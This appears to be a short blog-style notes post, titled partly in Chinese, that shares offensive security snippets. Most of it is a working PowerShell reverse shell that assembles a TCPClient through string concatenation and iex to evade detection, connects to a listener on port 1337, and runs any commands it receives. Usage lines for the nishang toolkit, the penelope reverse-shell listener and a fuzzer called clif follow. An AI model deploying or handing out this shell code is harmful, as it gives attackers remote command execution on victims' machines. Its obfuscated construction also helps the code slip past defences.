Interesting things share, 来点好玩的

$ip = '("127.0.0.1",'$port = "1337)"$socket ="New-Object"$space = " "$socket1 ="System.Net.Sockets.TCPClient"$client2 = $socket+"$space"+"$socket1"$client = "$client2"+"$ip"+"$port"
write-host $client
$client2 = iex $client

$stream = $client2.GetStream()
[byte[]]$bytes = 0..65535|%{0}while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)  $sendback = (iex $data 2>&1 | Out-String )  $sendback2 = $sendback + "PS " + (pwd).Path + "> "  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)  $stream.Write($sendbyte,0,$sendbyte.Length)  $stream.Flush()}$client2.Close()

PS C:nishang> Import-Module .nishang.psm1

./penelope.py                   # Listening for reverse shells on 0.0.0.0:4444./penelope.py -a                # Listening for reverse shells on 0.0.0.0:4444 and show reverse shell payloads based on the current Listeners./penelope.py 5555              # Listening for reverse shells on 0.0.0.0:5555./penelope.py 5555 -i eth0      # Listening for reverse shells on eth0:5555./penelope.py 1111 2222 3333    # Listening for reverse shells on 0.0.0.0:1111, 0.0.0.0:2222, 0.0.0.0:3333./penelope.py -c target 3333    # Connect to a bind shell on target:3333

使用:clif -e <executable> [-w <wordlist>, -n <number_range> -s <string_range>] -a "args_with_marks"
-e - executable-w - wordlist-a - arguments as string-n - number range-s - list of strings of 'A' a defined length range
例子:# throw wordlist.txt as inputclif -e my_program -w wordlist.txt 
# throw wordlist.txt as -p argumentclif -e my_program -w wordlist.txt -a "-p FUZZ" 
# throw numbers from range 100..100000000 as the first argumentclif -e my_program -n 100..100000000 -a "-n FUZZ" 
# throw a string with length from range 10..100 as the first argumentclif -e my_program -s 10..100